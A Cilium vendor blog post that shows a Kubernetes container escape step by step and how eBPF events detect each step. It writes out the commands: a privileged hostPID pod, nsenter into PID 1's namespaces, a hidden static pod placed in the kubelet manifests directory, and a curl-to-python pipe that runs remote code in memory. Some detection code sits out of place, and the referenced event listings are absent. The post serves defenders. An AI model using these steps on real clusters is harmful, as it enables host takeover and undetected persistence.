Detecting a Container Escape with Cilium and eBPF
If you run cloud native workloads, you had better secure them. After all, services are often exposed to the public, and workloads might belong to various tenants. In this blog post, we will show how an attacker with access to your Kubernetes cluster could perform a container escape: running a pod to gain root privileges, escaping the pod onto the host, and persisting the attack with invisible pods and fileless executions. We will also show how to detect these attacks with Isovalent Cilium Enterprise.
During a container escape, an attacker breaks the isolation boundary between the container and the host and lands on the underlying Kubernetes control plane or worker node. From there, the attacker can see other containers running on the same host, gather their secrets, read or write data on the host file system, attack kubelet and escalate privileges, or exploit a Kubernetes bug and persist in the environment by deploying an invisible pod.
Applying security best practices to a Kubernetes environment can limit these types of attacks, but a container breakout is still possible: an attacker can use a privileged pod or exploit an existing vulnerability to gain privileges. Security Teams need to measure whether their hardening configurations are suitable and whether the applied protections are working.
One way to achieve this is observability following a data-driven approach: collect data from Kubernetes workloads and hosts, observe feedback, and make continuous data-driven decisions to protect the Kubernetes environment.
By using eBPF, Security Teams can get unique visibility directly into any Kubernetes workload, such as a pod. Because pods on a Kubernetes node share a single kernel, every process within a pod is visible to a single eBPF program. This can provide full visibility into each process running on a node, whether it is a long-running process on the host managed by systemd or a short-lived process running inside a container.
Cilium uses eBPF to very efficiently monitor all network and process behaviour inside of Kubernetes workloads and outside on the host and gives you Kubernetes Identity Aware and OS Level Process Visibility into those behaviours.
Cilium deploys as a daemonset inside of a Kubernetes environment. So, there is a Cilium agent running on each Kubernetes node and it is communicating with the Kubernetes API server to understand Kubernetes Pod Identities, Network Policies, Services etc. Then based on the identity of each one of the workloads deployed inside of a Kubernetes environment, Cilium installs a highly efficient eBPF program to do Connectivity, Observability and Security for those workloads.
Rich Security Events
Cilium can both observe and enforce behaviour inside a Linux system. It can collect and filter Security Observability data directly in the kernel and export it to user space as JSON events and/or store them in a log file via a DaemonSet called hubble-enterprise. These JSON events are enriched with Kubernetes Identity Aware Information, including services, labels, namespaces, pods and containers, and with OS Level Process Visibility data, including process binaries, pids, uids and parent binaries with the full Process Ancestry Tree. These events can then be exported in a variety of formats and sent to external systems such as a SIEM (e.g. Elasticsearch or Splunk) or stored in an S3 bucket. For simplicity, in this blog post they are consumed directly from the log file.
By leveraging this real-time Network and Process-Level Visibility Data from the kernel via Cilium, Security Teams are able to see all the processes that have been executed in their Kubernetes environment, which helps them make continuous data-driven decisions and improve the security posture of their system. One such example is detecting a container escape.
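As a rough illustration of consuming such an export, the following Python sketch reads JSON lines and summarizes the process_exec events it finds. The field names used here (process_exec, process, binary, arguments, pod, namespace, name) are assumptions modeled on the JSON export of the open-source Tetragon project and may differ from what hubble-enterprise emits. The sample input is invented for the example.

```python
import json
from typing import Iterable, Iterator


def iter_exec_events(lines: Iterable[str]) -> Iterator[dict]:
    """Yield the process_exec payload of every line that parses as JSON."""
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # ignore log lines that are not JSON
        payload = event.get("process_exec") if isinstance(event, dict) else None
        if isinstance(payload, dict):
            yield payload


def summarize(payload: dict) -> str:
    """Render one event as '<namespace>/<pod>: <binary> <arguments>'."""
    process = payload.get("process") or {}
    pod = process.get("pod") or {}
    # Assumption: events for host processes carry no pod information.
    where = f"{pod.get('namespace')}/{pod.get('name')}" if pod else "host"
    parts = (process.get("binary", ""), process.get("arguments", ""))
    return f"{where}: {' '.join(part for part in parts if part)}"


# Invented sample input; real events carry many more fields.
SAMPLE_LINES = [
    "not a json line",
    json.dumps({
        "process_exec": {
            "process": {
                "binary": "/bin/bash",
                "arguments": "",
                "pod": {"namespace": "default", "name": "privileged-the-pod"},
            }
        }
    }),
]

for payload in iter_exec_events(SAMPLE_LINES):
    print(summarize(payload))
```

In practice the lines would come from the export log file or from standard input rather than from a hard-coded list.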
Let’s reach the host namespace
In this example, we use a privileged pod with host namespace configuration to represent a container escape attack. This is possible in a hardened Kubernetes environment, as we demonstrate here. Note that there are multiple ways to perform a breakout; for example, an attacker can also exploit a vulnerability to gain privileges and escape the container sandbox.
The first and easiest step for an attacker to perform a container escape would be to spin up a pod with a privileged Pod spec. Note: Kubernetes allows this by default, and the privileged flag grants the container all available kernel capabilities. The hostPID and hostNetwork flags place the container into the host PID and networking namespaces, so it can see and interact with all process and network resources. One easy example can be found in the following yaml file:
$ cat privileged.yaml
apiVersion: v1
kind: Pod
metadata:
  name: privileged-the-pod
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: privileged-the-pod
    image: nginx:latest
    ports:
    - containerPort: 80
    securityContext:
      privileged: true
So, let’s apply that privileged Pod spec:
$ kubectl apply -f privileged.yaml
pod/privileged-the-pod created
$ kubectl get pods
NAME                 READY   STATUS    RESTARTS   AGE
privileged-the-pod   1/1     Running   0          11s
Now the attacker has a privileged pod up and running, which gives them the same permissions they would have as root on the underlying node. Why is it so powerful? Because of the capabilities the pod has started with, including CAP_SYS_ADMIN, which is essentially the “new root” in Linux; a privileged container also gets access to all devices on the host machine. This capability, in combination with hostPID, lets the attacker break out of the container namespaces put in place, so they can interact with and exploit any other process or filesystem on the underlying node where the privileged pod is deployed.
With Cilium, Security Teams can detect any privileged container execution by picking up the corresponding process_exec event, which is exported to userspace and can be read with the following command:
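To make the risky parts of such a spec concrete, here is a small Python sketch that flags the settings discussed above in a Pod manifest that has already been parsed into a dictionary. The function name risky_settings is hypothetical, and the check is deliberately minimal; it is not a substitute for admission control.

```python
from typing import List

# Pod-level flags that place the containers into host namespaces.
HOST_NAMESPACE_FLAGS = ("hostPID", "hostNetwork", "hostIPC")


def risky_settings(pod: dict) -> List[str]:
    """Return the host-namespace flags and privileged containers found in a Pod manifest."""
    spec = pod.get("spec") or {}
    findings = [flag for flag in HOST_NAMESPACE_FLAGS if spec.get(flag) is True]
    for container in spec.get("containers") or []:
        security_context = container.get("securityContext") or {}
        if security_context.get("privileged") is True:
            findings.append("privileged:" + container.get("name", "<unnamed>"))
    return findings


# The manifest from this post, written as a Python dictionary.
PRIVILEGED_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "privileged-the-pod"},
    "spec": {
        "hostPID": True,
        "hostNetwork": True,
        "containers": [
            {
                "name": "privileged-the-pod",
                "image": "nginx:latest",
                "ports": [{"containerPort": 80}],
                "securityContext": {"privileged": True},
            }
        ],
    },
}

print(risky_settings(PRIVILEGED_POD))
```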
kubectl logs -n kube-system ds/hubble-enterprise -c export-stdout
Secondly, they can see the related:
- Kubernetes Identity Aware Information, such as the namespace: default, the pod name: privileged-the-pod, the container-id and the label
- OS Level Visibility Information, such as the binary: 0 and the arguments: nginx -g \"daemon off;
- Full Process Ancestry Tree, which includes /usr/bin/containerd-shim as a direct parent process binary
- Capabilities that the container has started with
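To illustrate what a capability set looks like at the OS level: Linux reports the capabilities of a process as hexadecimal bitmasks (for example the CapEff line in /proc/<pid>/status), where each bit position corresponds to a capability number defined in linux/capability.h. The Python sketch below decodes a few well-known bits. The table is intentionally partial, the helper name is hypothetical, and how hubble-enterprise encodes capabilities in its events is not covered by this sketch.

```python
from typing import List

# Partial table of capability bit positions from linux/capability.h.
CAP_BITS = {
    "CAP_CHOWN": 0,
    "CAP_DAC_OVERRIDE": 1,
    "CAP_NET_ADMIN": 12,
    "CAP_NET_RAW": 13,
    "CAP_SYS_MODULE": 16,
    "CAP_SYS_PTRACE": 19,
    "CAP_SYS_ADMIN": 21,
}


def decode_caps(mask: int) -> List[str]:
    """Return the names from CAP_BITS whose bit is set in the mask, sorted by name."""
    return sorted(name for name, bit in CAP_BITS.items() if mask & (1 << bit))


# A mask commonly reported for containers started with Docker's default settings.
DEFAULT_CONTAINER_MASK = 0x00000000A80425FB
# Illustrative mask with capability bits 0 through 40 all set.
ALL_BITS_MASK = (1 << 41) - 1

print(decode_caps(DEFAULT_CONTAINER_MASK))
print("CAP_SYS_ADMIN" in decode_caps(ALL_BITS_MASK))
```

A check along these lines makes it easy to see whether a process holds CAP_SYS_ADMIN, the capability highlighted earlier in this post.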
As a second step, the attacker can use kubectl exec to get shell access to the privileged pod:
kubectl exec -it privileged-the-pod -- /bin/bash
root@minikube:/#
A shell suddenly popping up in a container log after it was started is, of course, an event the Security Team is interested in. They can detect the bash execution by picking up the following process_exec event exported to userspace via Cilium. The Process Information can be seen between lines 4 and 11, while the Kubernetes Identity Aware Information can be seen between lines 12 and 24.
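A simple way to act on such events is to flag any shell started inside a pod. The Python sketch below assumes the event has already been parsed into a dictionary and that it exposes process.binary and process.pod; these field names are modeled on the open-source Tetragon export rather than taken from this post, and the list of shells is an arbitrary starting point.

```python
import posixpath

# Arbitrary starting list of shell binaries worth flagging.
SHELLS = {"sh", "bash", "dash", "ash", "zsh"}


def is_shell_in_pod(exec_event: dict) -> bool:
    """True when the executed binary is a known shell and the process belongs to a pod."""
    process = exec_event.get("process") or {}
    binary_name = posixpath.basename(process.get("binary", ""))
    return binary_name in SHELLS and bool(process.get("pod"))


# Invented sample events.
shell_event = {
    "process": {
        "binary": "/bin/bash",
        "pod": {"namespace": "default", "name": "privileged-the-pod"},
    }
}
nginx_event = {
    "process": {
        "binary": "/usr/sbin/nginx",
        "pod": {"namespace": "default", "name": "privileged-the-pod"},
    }
}

print(is_shell_in_pod(shell_event), is_shell_in_pod(nginx_event))
```

Legitimate entrypoint scripts also start shells, so a real rule would likely need an allow list or a check on the parent process.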
As a third step, the attacker can use the nsenter command to enter into the host namespace and run the bash command as root on the host.
root@minikube:/# nsenter -t 1 -a bash
bash-5.0#
The nsenter command executes a program in the namespaces of another process. The first flag, -t, defines the target process whose namespaces the attacker wants to enter. Every Linux machine runs a process with PID 1, which always runs in the host namespaces. The other command line arguments define which namespaces of that process to enter; in this case, -a selects all of them. So, the attacker is breaking out of the container in every possible way and running the bash command as root on the host.
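A detection for this step could look for nsenter executions that target PID 1. The Python sketch below works on a binary path and an argument string, such as the ones an exec event might carry; the function names are hypothetical. It handles only the "-t PID", "--target PID" and "--target=PID" spellings, and it assumes the pod runs with hostPID, since otherwise PID 1 is the container's own init process.

```python
import posixpath
import shlex
from typing import Optional


def nsenter_target(arguments: str) -> Optional[str]:
    """Return the PID passed via -t/--target, or None if no target is given."""
    tokens = shlex.split(arguments)
    for index, token in enumerate(tokens):
        if token in ("-t", "--target") and index + 1 < len(tokens):
            return tokens[index + 1]
        if token.startswith("--target="):
            return token.split("=", 1)[1]
    return None


def enters_host_namespaces(binary: str, arguments: str) -> bool:
    """True when nsenter is pointed at PID 1."""
    if posixpath.basename(binary) != "nsenter":
        return False
    return nsenter_target(arguments) == "1"


print(enters_host_namespaces("/usr/bin/nsenter", "-t 1 -a bash"))
```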
Security Teams can identify this breakout by picking up two process_exec events. In the first event, they are able to observe the executed nsenter command in line 8 with the appropriate namespace arguments -t 1 -a in line 9. They can also see the source pod name in line 15, which is privileged-the-pod, and all the Kubernetes Identity Aware and OS Level Visibility Information:
By picking up the second process_exec event, Security Teams are able to detect the bash execution in the host namespace with nsenter as the parent process binary. The Parent Process Information can be seen between lines 151 and 177, and the source binary name can be seen in line 8.
Now, the attacker has reached the host namespace on a node in a Kubernetes cluster and is running bash. We have used a privileged container with hostPID associations in this example. In the real world, this could also have been an unprivileged container with its own process namespace that then managed to exploit a kernel vulnerability to gain privileges and break out. What can they do? The attacker can see containers that are running on the same controller node, gather secrets associated with them, read data from the host file system, attack kubelet and escalate privileges; or exploit a special Kubernetes behavior and persist the breakout by firing up an invisible container. Let’s assume the attacker chooses the last option.
Container where are you?
Persist the breakout by creating a container that is invisible to the Kubernetes API server
Apart from stealing sensitive information from other Kubernetes workloads and peeking into other Kubernetes namespaces, the attacker can persist the breakout by starting a “hidden”, static pod.
There are many ways an attacker could create a persistent process to hide traces of further activities. For this example, we are going to use a static Kubernetes pod. Unfortunately, many Security Teams make the assumption that every time kubelet launches a workload, all the configs have been statically analyzed by the Kubernetes API server and its webhooks. They don’t take into account that if an attacker inserts a Pod spec under the /etc/kubernetes/manifests directory on a kubeadm managed cluster, kubelet will automatically launch the pod without notifying the Kubernetes API server about it.
To persist the breakout, the attacker can go to the /etc/kubernetes/manifests directory on the controller node, since they have access to all the resources, and take a look at what is there:
bash-5.0# cd /etc/kubernetes/manifests/
bash-5.0# ls -l
total 20
-rw------- 1 root root 2289 Oct 13 12:40 etcd.yaml
-rw------- 1 root root 3595 Oct 13 12:40 kube-apiserver.yaml
-rw------- 1 root root 2895 Oct 13 12:40 kube-controller-manager.yaml
-rw------- 1 root root 1385 Oct 13 12:40 kube-scheduler.yaml
As a next step, the attacker can insert a Pod spec named hack-latest.yaml with a namespace that doesn’t exist (namespace: doesnt-exist). This way the pod will be picked up by kubelet by default and will still be invisible to the Kubernetes API server.
bash-5.0# cat << EOF > hack-latest.yaml
> apiVersion: v1
> kind: Pod
> metadata:
>   name: hack-latest
>   hostNetwork: true
>   # define in namespace that doesn't exist so
>   # workload is invisible to the API server
>   namespace: doesnt-exist
> spec:
>   containers:
>   - name: hack-latest
>     image: sublimino/hack:latest
>     command: ["/bin/sh"]
>     args: ["-c", "while true; do sleep 10;done"]
>     securityContext:
>       privileged: true
>   # Define the control plane node the privileged pod
>   # will be scheduled to
>   nodeName: kind-control-plane
> EOF
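Because kubelet launches whatever is placed in this directory, a defender could periodically compare its contents with the set of manifests that are expected to be there. The Python sketch below does exactly that; the function name is hypothetical, the expected set is taken from the directory listing in this post, and the demo runs against a temporary directory rather than a real node.

```python
import os
import tempfile
from typing import Iterable, List


def unexpected_manifests(directory: str, expected: Iterable[str]) -> List[str]:
    """Return the names of regular files in the directory that are not expected."""
    expected_names = set(expected)
    with os.scandir(directory) as entries:
        return sorted(
            entry.name
            for entry in entries
            if entry.is_file() and entry.name not in expected_names
        )


# Expected static pod manifests, as listed in this post.
EXPECTED = {
    "etcd.yaml",
    "kube-apiserver.yaml",
    "kube-controller-manager.yaml",
    "kube-scheduler.yaml",
}

# Demo against a throwaway directory that mimics the compromised node.
with tempfile.TemporaryDirectory() as manifests_dir:
    for name in sorted(EXPECTED) + ["hack-latest.yaml"]:
        with open(os.path.join(manifests_dir, name), "w") as handle:
            handle.write("# placeholder\n")
    print(unexpected_manifests(manifests_dir, EXPECTED))
```

A comparison like this only covers the file-based path; it complements, rather than replaces, the event-based detection described in this post.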
As a validation, the attacker can first run crictl ps and see that the container is running on the controller node. The following bash snippet shows that the hack-latest container is up and running with the docker id cc7f47efbbfee:
bash-5.0# crictl ps
CONTAINER       IMAGE   CREATED   STATE   NAME   ATTEMPT   POD ID
cc7f47efbbfee   sublimino/hack@sha256:569f3fd3a626a4cfd50e4556425216a5b8ab3d8bf9476c1b1c615b83ffe4000a   About a minute ago   Running   hack-latest   0   895972101d32b
e083d7868b7ff   cilium/json-mock@sha256:d8797011275f12c0a22d308227364493954c9e07e21c96c7caf6cf50b892d638   19 minutes ago   Running   frontend-service   0   31260e2cd0dc8
a025e4319f354   cilium/json-mock@sha256:d8797011275f12c0a22d308227364493954c9e07e21c96c7caf6cf50b892d638   19 minutes ago   Running   backend-service   0   a455f019f215b
...
Secondly, the attacker can run kubectl get pods --all-namespaces from outside the controller node, which shows that the hack-latest container is completely invisible to the Kubernetes API server:
$ kubectl get pods --all-namespaces
NAMESPACE     NAME                               READY   STATUS    RESTARTS   AGE
default       privileged-the-pod                 1/1     Running   0          51m
kube-system   cilium-n8wtg                       1/1     Running   0          75m
kube-system   cilium-operator-65fcccb665-7vwjh   0/1     Pending   0          75m
kube-system   cilium-operator-65fcccb665-bbfph   1/1     Running   0          75m
kube-system   coredns-558bd4d5db-hvvph           1/1     Running   0          75m
kube-system   etcd-minikube                      1/1     Running   0          76m
kube-system   hubble-enterprise-jrl56            2/2     Running   0          55m
kube-system   hubble-relay-8676fb6fdc-r4285      1/1     Running   0          75m
kube-system   hubble-ui-7f6d94945b-mtffv         3/3     Running   0          75m
kube-system   kube-apiserver-minikube            1/1     Running   0          76m
kube-system   kube-controller-manager-minikube   1/1     Running   0          76m
kube-system   kube-proxy-m958t                   1/1     Running   0          76m
kube-system   kube-scheduler-minikube            1/1     Running   0          76m
kube-system   storage-provisioner                1/1     Running   1          76m
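The mismatch between the two views can itself be turned into a check. The Python sketch below compares the pods known to the container runtime with the pods known to the API server, both given as (namespace, name) pairs. How those pairs are collected is out of scope here, and the sample values are simplified and invented for the example; in particular, the actual name of the hidden pod on the node is an assumption.

```python
from typing import Iterable, List, Tuple

Pod = Tuple[str, str]  # (namespace, pod name)


def pods_missing_from_api(runtime_pods: Iterable[Pod], api_pods: Iterable[Pod]) -> List[Pod]:
    """Return pods that the runtime reports but the API server does not list."""
    return sorted(set(runtime_pods) - set(api_pods))


# Invented, simplified sample data.
RUNTIME_PODS = [
    ("default", "privileged-the-pod"),
    ("kube-system", "etcd-minikube"),
    ("doesnt-exist", "hack-latest"),
]
API_PODS = [
    ("default", "privileged-the-pod"),
    ("kube-system", "etcd-minikube"),
]

print(pods_missing_from_api(RUNTIME_PODS, API_PODS))
```

A set difference keeps the check cheap, but it can report short-lived false positives while a pod is being created or deleted.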
With Cilium, Security Teams can follow the attacker’s moves up to the creation of the invisible container by picking up the following exported process_exec events.
The first event shows the hack-latest.yaml Pod spec insertion under the /etc/kubernetes/manifests/ directory. The source binary can be seen in line 8, while the current working directory is shown in line 7.
By detecting the second process_exec event, Security Teams are able to pick up the invisible hack-latest container execution, with the source binary in line 8 and the arguments in line 9.
Execute a malicious Python script in memory
Now that the attacker has persisted the breakout by spinning up an invisible container, they can download and execute a malicious script in memory that never touches disk. Note that this simple Python script can act as fileless malware, which is almost impossible to detect by using traditional userspace tools.
As a first step, the attacker can docker exec into the invisible container:
bash-5.0# docker exec -it cc7f47efbbfee /bin/bash
PRETTY_NAME="Alpine Linux v3.12"
root@minikube:~
Then they download a malicious Python script and execute it in memory:
root@minikube:~ # curl https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py | python
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   488  100   488    0     0   1574      0 --:--:-- --:--:-- --:--:--  1574
With Cilium, Security Teams are able to follow the attacker’s movement by using the power of the kernel, gain real-time visibility into the memory of the processes and into network connections, and observe system access.
They can pick up the following process_exec events. With the first event, they are able to see the bash execution in a container with a docker id of cc7f47efbbfee, which is the invisible hack-latest container. The docker id can be seen in line 12, while the source binary can be seen in line 8.
In the second process_exec event, Security Teams are able to observe the sensitive curl command in line 8 with the argument https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py in line 9:
With the third event, a process_connect event, Security Teams are also able to pick up the sensitive socket connection opened via curl with the argument https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py, the destination IP 22.214.171.124 and port 443. The Source and Destination Address Information can be found between lines 29 and 32, while the Process Information can be found between lines 4 and 14.
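One way to use the destination address from a connect event is to check whether it falls outside the address ranges the workloads are expected to talk to. The Python sketch below uses the standard ipaddress module; the function name is hypothetical, the CIDR ranges are placeholders rather than values from this cluster, and the external address comes from a range reserved for documentation.

```python
import ipaddress
from typing import Iterable


def is_external(destination_ip: str, internal_cidrs: Iterable[str]) -> bool:
    """True when the destination address is in none of the given networks."""
    address = ipaddress.ip_address(destination_ip)
    return not any(
        address in ipaddress.ip_network(cidr) for cidr in internal_cidrs
    )


# Placeholder ranges; a real cluster would use its own pod and service CIDRs.
INTERNAL_CIDRS = ["10.0.0.0/8", "192.168.0.0/16"]

print(is_external("203.0.113.10", INTERNAL_CIDRS))
print(is_external("10.244.1.7", INTERNAL_CIDRS))
```

Combined with the process information in the same event, such a check can highlight containers that suddenly start talking to the internet.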
Lastly, with the fourth event, a process_exec event, Security Teams are able to pick up the malicious Python script execution in memory. The cc7f47efbbfee2ff38382d32 docker id of the container can be seen in line 12, while the /usr/bin/python source binary can be seen in line 8.
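A telltale sign of this kind of fileless execution is an interpreter that starts without a script path, because the program arrives on standard input. The Python sketch below flags that pattern for Python interpreters only. The function name is hypothetical, the inputs are a binary path and an argument string such as an exec event might carry, and interactive sessions match as well, so this is a hint rather than a verdict.

```python
import posixpath


def reads_program_from_stdin(binary: str, arguments: str) -> bool:
    """True for a Python interpreter started with no arguments or with '-' only."""
    name = posixpath.basename(binary)
    if not name.startswith("python"):
        return False
    # With no script argument, or with '-', Python reads the program from stdin.
    return arguments.strip() in ("", "-")


print(reads_program_from_stdin("/usr/bin/python", ""))
print(reads_program_from_stdin("/usr/bin/python", "zipper.py"))
```

Correlating such an event with a preceding curl execution and outbound connection from the same container would make the signal considerably stronger.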
Securing a Kubernetes environment can be challenging. Measuring the current state of the security posture in your Kubernetes environment requires Observability. Security Teams need to start collecting the right data to be able to detect a sophisticated attack, like a container escape that occurs within a Kubernetes environment.
The container escape attack that was covered in this blog post included simple but effective steps proving that Security Teams need Observability and the ability to Measure the data to be able to detect those steps.
By leveraging the Observability of Isovalent Cilium Enterprise, they can detect behaviours that are outside of the security posture of their environment.
This becomes possible by the superpower of eBPF and Cilium.
If you want to learn more about Isovalent Cilium Enterprise, the open source project Cilium or the underlying technology eBPF, join us for an “Ask Me Anything” with one of our technical experts.
Also make sure to check out:
- Feature set of Isovalent Cilium Enterprise
- User Stories and Deep Dives for Isovalent Cilium Enterprise
- Cilium Open Source Project
- eBPF Community Resources
Isovalent is the company founded by the creators of Cilium and eBPF. Isovalent builds open-source software and enterprise solutions solving networking, security, and observability needs for modern cloud native infrastructure. The flagship technology Cilium is the choice of leading global organizations including Adobe, AWS, Capital One, Datadog, GitLab, Google, and many more. Isovalent is headquartered in Mountain View, CA and is backed by Andreessen Horowitz, Google and Cisco Investments. To learn more, visit isovalent.com or follow @isovalent.